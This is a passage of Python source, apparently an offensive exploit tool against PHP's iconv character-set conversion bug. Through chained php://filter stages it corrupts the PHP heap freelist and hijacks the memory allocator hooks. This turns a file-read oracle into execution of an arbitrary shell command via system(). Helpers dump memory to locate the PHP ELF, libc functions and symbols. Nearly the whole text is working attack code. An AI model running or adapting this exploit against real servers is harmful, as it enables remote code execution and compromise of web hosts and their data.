            page = address - PAGE_SIZE * i
            if md.expect(page, b"\x7fELF"):
                break
        else:
            failure("Unable to find ELF header")
            
        return page

    def find_php_elf(self) -> int:
        """Finds the PHP ELF file in memory. To do so, we find the first 0x38 page in
        the heap. We expect it to contain zend_arrays, and therefore their PDestructor
        field, which points to zval_ptr_dtor. We then look for the ELF header page by
        page, starting from zval_ptr_dtor. It takes ages, and is actually what prompted
        the implementation of the FAST_PATH.
        """
        assert self.php_elf is None

        address = self._find_elf_header(self.zval_ptr_dtor, PHP_ELF_MIN_PAGE_DISTANCE, PHP_ELF_MAX_PAGE_DISTANCE)
        msg_success(f"Found PHP ELF header at {addr(address)} {option_help('-p')}")
        self.php_elf = address

    def execute(self) -> str:
        """On each step of the exploit, a filter will process each chunk one after the
        other. Processing generally involves making some kind of operation either
        on the chunk or in a destination chunk of the same size. Each operation is
        applied on every single chunk; you cannot make PHP apply iconv on the first 10
        chunks and leave the rest in place. That's where the difficulties come from.

        Keep in mind that we know the address of the main heap, and the libraries.
        ASLR/PIE do not matter here.

        The idea is to use the bug to make the freelist for chunks of size 0x100 point
        lower. For instance, we have the following free list:

        ... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00

        By triggering the bug from chunk ..900, we get:

        ... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???

        That's step 3.

        Now, in order to control the free list, and make it point whereever we want,
        we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,
        we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.
        That's step 2.

        Now, if we were to perform step2 an then step3 without anything else, we'd have
        a problem: after step2 has been processed, the free list goes bottom-up, like:

        0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900

        We need to go the other way around. That's why we have step 1: it just allocates
        chunks. When they get freed, they reverse the free list. Now step2 allocates in
        reverse order, and therefore after step2, chunks are in the correct order.

        Another problem comes up.

        To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.
        Since step2 creates chunks that contain pointers and pointers are generally not
        UTF-8, we cannot afford to have that conversion happen on the chunks of step2.
        To avoid this, we put the chunks in step2 at the very end of the chain, and
        prefix them with `0\n`. When dechunked (right before the iconv), they will
        "disappear" from the chain, preserving them from the character set conversion
        and saving us from an unwanted processing error that would stop the processing
        chain.

        After step3 we have a corrupted freelist with an arbitrary pointer into it. We
        don't know the precise layout of the heap, but we know that at the top of the
        heap resides a zend_mm_heap structure. We overwrite this structure in two ways.
        Its free_slot[] array contains a pointer to each free list. By overwriting it,
        we can make PHP allocate chunks whereever we want. In addition, its custom_heap
        field contains pointers to hook functions for emalloc, efree, and erealloc
        (similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and
        then overwrite the use_custom_heap flag to make PHP use these function pointers
        instead. We can now do our favorite CTF technique and get a call to
        system(<chunk>).
        We make sure that the "system" command kills the current process to avoid other
        system() calls with random chunk data, leading to undefined behaviour.

        The pad blocks just "pad" our allocations so that even if the heap of the
        process is in a random state, we still get contiguous, in order chunks for our
        exploit.

        Therefore, the whole process described here CANNOT crash. Everything falls
        perfectly in place, and nothing can get in the middle of our allocations.
        """

        ADDR_EMALLOC = self.malloc
        ADDR_EFREE = self.system
        ADDR_EREALLOC = self.realloc

        ADDR_HEAP = self.heap
        ADDR_FREE_SLOT = ADDR_HEAP + 0x20
        ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168

        ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10

        CS = 0x100

        # Pad needs to stay at size 0x100 at every step
        pad_size = CS - 0x18
        pad = b"\x00" * pad_size
        pad = self.russian_doll(pad, -6, -6, -6)

        step1_size = 1
        step1 = b"\x00" * step1_size
        step1 = self.russian_doll(step1, 0, 0, CS)

        # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
        # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"

        step2_size = 0x48
        step2 = b"\x00" * (step2_size + 8)
        step2 = self.russian_doll(step2, CS, 0)

        step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
        step2_write_ptr = self.russian_doll(step2_write_ptr, CS, 0)

        step3_size = CS
        step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
        assert len(step3_overflow) == CS
        step3_overflow = self.russian_doll(step3_overflow, 0, 0, 0)

        step4_size = CS
        step4 = b"=00" + b"\x00" * (step4_size - 1)
        step4 = self.russian_doll(step4, 0, 0, 0)

        
        def ptr_bucket(*ptrs, size=None) -> bytes:
            """Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
            if size is not None:
                assert len(ptrs) * 8 == size
            bucket = b"".join(map(p64, ptrs))
            bucket = qpe(bucket)
            bucket = self.russian_doll(bucket, 0, 0, 0)

            return bucket

        # This chunk will eventually overwrite mm_heap->free_slot
        # it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
        step4_pwn = ptr_bucket(
            0x200000,
            0,
            # free_slot
            0,
            0,
            ADDR_CUSTOM_HEAP,  # 0x18
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            ADDR_HEAP,  # 0x140
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            size=CS,
        )

        step4_custom_heap = ptr_bucket(
            ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
        )

        step4_use_custom_heap_size = 0x140

        COMMAND = self.command
        COMMAND = f"kill -9 $PPID; {COMMAND}"
        if self.sleep:
            COMMAND = f"sleep {self.sleep}; {COMMAND}"
        COMMAND = COMMAND.encode() + b"\x00"

        assert (
            len(COMMAND) <= step4_use_custom_heap_size
        ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
        COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")

        step4_use_custom_heap = COMMAND
        step4_use_custom_heap = qpe(step4_use_custom_heap)
        step4_use_custom_heap = self.russian_doll(step4_use_custom_heap, 0, 0, 0)

        pages = (
            step4 * 3
            + step4_pwn
            + step4_custom_heap
            + step4_use_custom_heap
            + step3_overflow
            + pad * 20
            + step1 * 3
            + step2_write_ptr
            + step2 * 2
        )

        resource = self._data_to_resource(pages)

        filters = [
            # Create buckets
            "zlib.inflate",
            "zlib.inflate",
            
            # Step 0: Setup heap
            "dechunk",
            "convert.iconv.L1.L1",
            
            # Step 1: Reverse FL order
            "dechunk",
            "convert.iconv.L1.L1",
            
            # Step 2: Put fake pointer and make FL order back to normal
            "dechunk",
            "convert.iconv.L1.L1",
            
            # Step 3: Trigger overflow
            "dechunk",
            "convert.iconv.UTF-8.ISO-2022-CN-EXT",
            
            # Step 4: Allocate at arbitrary address and change zend_mm_heap
            "convert.quoted-printable-decode",
            "convert.iconv.L1.L1",
        ]
        
        filters = "|".join(filters)
        path = f"php://filter/read={filters}/resource={resource}"

        start = time.time()

        try:
            self.remote.oracle(path)
        except:
            self.logger.exception("The oracle raised an exception (although that could be normal)")
        
        msg_print()
        
        if not self.sleep:
            msg_print(Align.center("[b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]"))
        elif start + self.sleep <= time.time():
            msg_print(Align.center("[b white on black] EXPLOIT [/][b white on green] SUCCESS [/]"))
        else:
            msg_print(Align.center("[b white on black] EXPLOIT [/][b white on red] FAILURE [/]"))
        
        msg_print()

@dataclass
class LinkedBruteforcer(Bruteforcer):
    exploit: Exploit
    filters: list[str]
    resource: str
    HEADER = ""

    def __post_init__(self) -> None:
        super().__init__(0)
        self.logger = logger(self.__class__.__name__)

    @classmethod
    def compute_write(cls, filters: list[str]) -> str:
        """To make sure that the heap does not change too much, we add dummy filters so
        that PHP creates the associated structures. They do not impact our exploit, as
        they are write filters. However, they will be called when the stream is finally
        freed, at the end of the execution. We thus convert any funky charset to latin1,
        to make sure PHP does not report errors. This also makes sure that the length of
        the path is always the same.

        Although this is very helpful, this is not perfect. The order in which the
        filters are created matters as well. However, we cannot control this perfectly.
        """
        filters = Counter(filters)
        missing = []

        for filter, number in cls.FILTER_USAGE.items():
            used = filters.get(filter, 0)
            if filter.startswith("convert.iconv."):
                _, _, ffrom, fto = filter.split(".")
                if len(ffrom) >= 2:
                    ffrom = "L1".ljust(len(ffrom), " ")
                if len(fto) >= 2:
                    fto = "L1".ljust(len(fto), " ")
                filter = f"convert.iconv.{ffrom}.{fto}"
            if used < number:
                missing += [filter] * (number - used)

        # assert (Counter(missing) + Counter(filters) == Counter(cls.FILTER_USAGE))
        return "|".join(missing)

    def send(self, filters: str) -> bool:
        """Sends a filter chain with the given filters, and returns True if the
        expansion happened.
        """
        filters = [filter for filter in filters.split("|") if filter]

        filters = self.filters + filters
        return self.exploit.oracle(filters, self.resource)


def put(buffer: bytearray, position: int, data: bytes) -> None:
    if position < 0:
        position = len(buffer) + position
    buffer[position : position + len(data)] = data


@dataclass
class MemoryDumper:
    exploit: Exploit
    base: int
    log = logger("MemoryDumper")

    def dump(self, address: int, size: int, message: str = None) -> bytes:
        address += self.base
        self.log.debug(f"Dumping memory at {address:#x} for {size:#x} bytes")
        return self.exploit.dump_memory(address, size, message=message)

    def expect(self, address: int, expected: bytes) -> bool:
        address += self.base
        self.log.debug(f"Dumping memory at {address:#x} expecting {expected.hex()}")
        return self.exploit.expect_memory(address, expected)

    def unpack(self, address: int, format: str, message: str = None) -> tuple:
        data = self.dump(address, struct.calcsize(format), message=message)
        return struct.unpack(format, data)

    def offset(self, address: int) -> MemoryDumper:
        return MemoryDumper(self.exploit, self.base + address)


@dataclass
class ELFDumper(MemoryDumper):
    """Provides helpers to dump an ELF file from memory.
    """
    # Program header types
    DT_NEEDED = 1
    DT_DYNAMIC = 2
    # Dynamic segment types
    DT = {
        "STRTAB": 0x05,
        "SYMTAB": 0x06,
        "JMPREL": 0x17,
        "GNU_HASH": 0x6FFFFEF5,
    }

    dynamic_section: MemoryDumper = field(init=False)
    segments: dict[str, MemoryDumper] = field(init=False, default_factory=dict)
    gnu_hash_info: dict[str, int] = field(init=False, default=None)

    def identify(self) -> None:
        self.expect(0, b"\x7fELF")
        self.expect(5, b"\x02")  # x64
        self.expect(6, b"\x01")  # little endian

    def setup_gnu_hash(self) -> None:
        self.get_dynamic_section()
        self.get_dynamic_segments("STRTAB", "SYMTAB", "GNU_HASH")
        self.parse_gnu_hash()
        
    def find_some_libc_function(self) -> int:
        """Finds the address of a libc function in the JMPREL section.
        """
        rela = self.segments["JMPREL"]
        symtab = self.segments["SYMTAB"]
        strtab = self.segments["STRTAB"]
        
        libc_functions = to_bytes(table.read("libc-functions.list"))
        
        # Go through the .rela.plt section looking for a function name that matches
        # one of the libc functions
        for i in track(range(0, 0x2000, 0x18), "Looking for a libc function in the [i]JMPREL[/] section"):
            # the 4 MSB of r_info are the index of the symbol in the symbol table
            r_info, = rela.unpack(i + 8 + 4, "<I")
            # offset of the name in the str table
            st_name = u32(symtab.dump(0x18 * r_info, 3) + b"\x00")
            
            # Dump 3 characters at a time until we find a null byte
            # If at any point, the name cannot be a libc function, bail out
            name = b""
            while any(libc_function.startswith(name) for libc_function in libc_functions):
                name += strtab.dump(st_name + len(name), 3)
                if (end := name.find(b"\x00")) != -1:
                    name = name[:end]
                    break
            
            if name in libc_functions:
                break
        else:
            failure("Could not find any libc function in the [i]JMPREL[/] section")
            
        name = name.decode()
        
        with msg_status(f"Dumping address of [i]{name}@libc[/]"):
            r_offset, = rela.unpack(i + 0, "<I")
            address, = self.unpack(r_offset, '<Q')
        
        msg_success(f"Found libc function: [i]{name}[/] at {addr(address)}")
        return address

    def get_symbol(self, name: str) -> int:
        """Go through .dynsym to find a symbol. Slow.
        """
        name = name.encode() + b"\x00"

        symtab = self.segments["SYMTAB"]
        strtab = self.segments["STRTAB"]
        
        for symbol in itertools.count(0, 0x18):
            # We expect strtab to be of size 0xffffff or less, and thus only dump 3
            # bytes. This reduces the time required to find the symbol.
            st_name = u32(symtab.dump(symbol, 3) + b"\x00")
            if strtab.expect(st_name, name):
                st_value, = symtab.unpack(symbol + 8, '<Q')
                msg_info(f"Got address of symbol {name}: {st_value:#x}")
                return st_value

    def get_dynamic_section(self) -> None:
        """Finds DT_DYNAMIC in the program headers and obtains its virtual offset."""
        with msg_status("Parsing ELF header"):
            (e_phoff,) = self.unpack(0x20, "<Q")
            e_phentsize, e_phnum = self.unpack(0x36, "<HH")

        msg_info(f"ELF contains [i]{e_phnum}[/] program headers")

        self.log.info(
            f"Got {e_phnum} program headers in ELF, at offset {e_phoff:#x}, size {e_phentsize:#x}"
        )

        for i in track(
            range(e_phnum), "Looking for the [i]DT_DYNAMIC[/] program header"
        ):
            program_header = e_phoff + i * e_phentsize
            # TODO CAREFUL about the endianness
            # TODO Careful about PIEness
            if self.expect(program_header, p32(self.DT_DYNAMIC)):
                break
        else:
            failure("[i]DT_DYNAMIC[/] program header not found")

        msg_info(f"Found [i]DT_DYNAMIC[/] program header at offset {addr(program_header)}")
        
        with msg_status("Parsing [i]DT_DYNAMIC[/] program header"):
            (p_vaddr,) = self.unpack(program_header + 0x10, "<Q")
            # Truncating to 4 bytes only, the size should not be bigger
            (p_memsz,) = self.unpack(program_header + 0x28, "<I")
        msg_info(f"Got virtual offset for [i]DT_DYNAMIC[/] at {addr(p_vaddr)}, size {p_memsz:#x}")

        self.dynamic_section = self.offset(p_vaddr)
        self.dynamic_section.size = p_memsz

    def parse_gnu_hash(self) -> None:
        """Parses the GNU hash table to find the address of a symbol."""
        # Read the GNU hash table header
        with msg_status("Dumping [i]GNU_HASH[/] header"):
            nbuckets, symndx, maskwords, shift2 = self.segments["GNU_HASH"].unpack(0, "<IIII")
        msg_info(
            f"Got [i]GNU_HASH[/] header: nbuckets={nbuckets}, symndx={symndx}, maskwords={maskwords}, shift2={shift2}"
        )

        # Calculate the addresses of the bloom filter, hash buckets, and hash values
        bloom_filter_offset = 16
        hash_buckets_offset = bloom_filter_offset + (maskwords * 8)
        hash_values_offset = hash_buckets_offset + (nbuckets * 4)

        # msg_info(f"Bloom filter offset: {bloom_filter_offset:#x}")
        # msg_info(f"Hash buckets offset: {hash_buckets_offset:#x}")
        # msg_info(f"Hash values offset: {hash_values_offset:#x}")

        self.gnu_hash_info = {
            "nbuckets": nbuckets,
            "symndx": symndx,
            "maskwords": maskwords,
            "shift2": shift2,
            "bloom_filter_addr": bloom_filter_offset,
            "hash_buckets_offset": hash_buckets_offset,
            "hash_values_offset": hash_values_offset,
        }

    def get_dynamic_segments(self, *entries: str) -> None | NoReturn:
        """Looks for tags in the dynamic section.
        """
        ds = self.dynamic_section

        # Iterate through the dynamic section, looking for specific entries
        # TODO We didn't dump the size, so we might iterate endlessly if an entry is not
        # found
        for element in track(range(0, ds.size, 0x10), "Looking for interesting dynamic segments"):
            # We cheat and only dump 1 byte instead of the 8 constituting the tag.
            (d_tag_lsb,) = ds.dump(element, 1)
            
            for entry in entries:
                if entry in self.segments:
                    continue
                if d_tag_lsb == self.DT[entry] & 0xFF:
                    break
            else:
                continue
            
            (d_val,) = ds.unpack(element + 8, "<Q")
            msg_info(f"Got address for [i]{entry}[/] at {addr(d_val)}")
            self.segments[entry] = MemoryDumper(self.exploit, d_val)
            
            if all(item in self.segments for item in entries):
                break
        else:
            missing = ", ".join(f"[i]{entry}[/]" for entry in set(entries) - set(self.segments))
            failure(f"Could not find {missing} segments in dynamic section")

    def compute_hash(self, name: str) -> int:
        """Computes the bloom hash of the given symbol name."""
        h = 5381
        for c in name:
            h = (h << 5) + h + ord(c)
        return h & 0xFFFFFFFF

    def find_symbol_from_hash(self, name: str) -> int:
        """Finds the address of the given symbol name using the GNU_HASH section."""
        
        gh = self.segments["GNU_HASH"]
        symtab = self.segments["SYMTAB"]
        strtab = self.segments["STRTAB"]
        
        with msg_status(f"Looking for address of [i]{name}[/] using [i]GNU_HASH[/]"):
            gnu_hash_info = self.gnu_hash_info

            nbuckets = gnu_hash_info["nbuckets"]
            symndx = gnu_hash_info["symndx"]
            hash_buckets_offset = gnu_hash_info["hash_buckets_offset"]
            hash_values_offset = gnu_hash_info["hash_values_offset"]

            # Compute the hash of the symbol name
            hash = self.compute_hash(name)
            bname = name.encode() + b"\x00"
            bucket = hash % nbuckets

            # Get the symbol index from the hash bucket
            sym_index_offset = hash_buckets_offset + (bucket * 4)
            (sym_index,) = gh.unpack(sym_index_offset, "<I")

            if sym_index == 0:
                raise ValueError(f"Symbol {name} not found")

            # Iterate through the hash values to find the symbol
            for i in itertools.count(sym_index, 1):
                hash_value_addr = hash_values_offset + ((i - symndx) * 4)
                (hash_value,) = gh.unpack(hash_value_addr, "<I")

                if (hash_value & ~1) == (hash & ~1):
                    (st_name,) = symtab.unpack(i * 24, "<I")
                    # msg_debug(
                    #     f"Found symbol {name} at index {st_name:#x} with hash {hash_value:#x}"
                    # )

                    if strtab.expect(st_name, bname):
                        (st_value,) = symtab.unpack((i * 24) + 8, "<Q")
                        # msg_success(
                        #     f"Got address of symbol [i]{name}[/]: {addr(st_value)}"
                        # )
                        return st_value

                if hash_value & 1:
                    break

            raise ValueError(f"Symbol {name} not found")


class UnexpectedBytesException(Exception):
    """Raised when the bytes that were dumped are not what was expected.
    """


def compress(data: bytes) -> bytes:
    """Returns compressed data, suitable for `zlib.inflate`."""
    # NOTE This does not decompress properly in some cases. I don't know why.
    # Remove 2-byte header and 4-byte checksum
    # old = zlib.compress(data, 9)[2:-4]
    # print(len(old))
    object = zlib.compressobj(level=9, wbits=-15, memLevel=9)
    new = object.compress(data) + object.flush()
    # print(len(new))
    return new


def b64(data: bytes, misalign=True) -> bytes:
    payload = base64.encode(data)
    if not misalign and payload.endswith("="):
        raise ValueError(f"Misaligned: {data}")
    return payload.encode()


def compressed_bucket(data: bytes) -> bytes:
    """Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
    return chunked_chunk(data, 0x8000)


def qpe(data: bytes) -> bytes:
    """Emulates quoted-printable-encode."""
    return "".join(f"={x:02x}" for x in data).upper().encode()


def chunked_chunk(data: bytes, size: int = None) -> bytes:
    """Constructs a chunked representation of the given chunk. If size is given, the
    chunked representation has size `size`.
    For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
    """
    # The caller does not care about the size: let's just add 8, which is more than
    # enough
    if size is None:
        size = len(data) + 8
    keep = len(data) + len(b"\n\n")
    size = f"{len(data):x}".rjust(size - keep, "0")
    return size.encode() + b"\n" + data + b"\n"

def option_help(name: str) -> str:
    """Returns a string that can be used to display the help for the given option."""
    return f"[black]({name})[/]"

def addr(address: int) -> str:
    return f"[magenta]{address:#x}[/]"


class Filters:
    """A collection of filters used in the exploit."""
    REV_2 = "convert.iconv.UTF-16LE.UTF-16BE"
    REV_4 = "convert.iconv.UCS-4LE.UCS-4"
    ADD3 = [
        "convert.base64-encode",
        "convert.iconv.UTF8.CSISO2022KR",
        "convert.base64-decode",
        "convert.base64-encode",
        "convert.iconv.JS.UNICODE",
        "convert.iconv.L4.UCS2",
        "convert.base64-decode",
        "convert.base64-encode",
        "convert.iconv.UTF8.CSISO2022KR",
        "convert.base64-decode",
        "convert.base64-encode",
        "convert.iconv.UTF8.CSISO2022KR",
        "convert.base64-decode",
    ]
    DITCH_4 = (
        ADD3
        + [REV_4]
        + ADD3
        + ["convert.base64-decode", "convert.base64-encode"]
        + [REV_2]
    )
    REMOVE_EQUALS = [
        "convert.iconv.L1.UTF7",
        "convert.base64-decode",
        "convert.base64-encode",
    ]
    QUARTET_DIGITS = [
        [],  # 1
        [REV_2],  # 2
        [REV_4, REV_2],  # 3
        [REV_4],  # 4
    ]

    @staticmethod
    def base(mid: int) -> list:
        """Gets a list of base filters. `mid` indicates the number of times we dechunk
        into L1.
        """
        return (
            [
                "zlib.inflate",
                "zlib.inflate",
            ]
            + [
                "dechunk",
                "convert.iconv.L1.L1",
            ]
            * mid
            + [
                "dechunk",
                "convert.iconv.UTF-8.ISO-2022-CN-EXT",
            ]
        )

def p64(value):
    """Pack a 64-bit integer into a byte string."""
    return struct.pack('<Q', value)

def u64(value):
    """Unpack a 64-bit integer from a byte string."""
    return struct.unpack('<Q', value)[0]

def p32(value):
    """Pack a 32-bit integer into a byte string."""
    return struct.pack('<I', value)

def u32(value):
    """Unpack a 32-bit integer from a byte string."""
    return struct.unpack('<I', value)[0]

def unhex(value: str) -> int:
    """Converts an hex string to an integer."""
    return int(value, 16)

Exploit()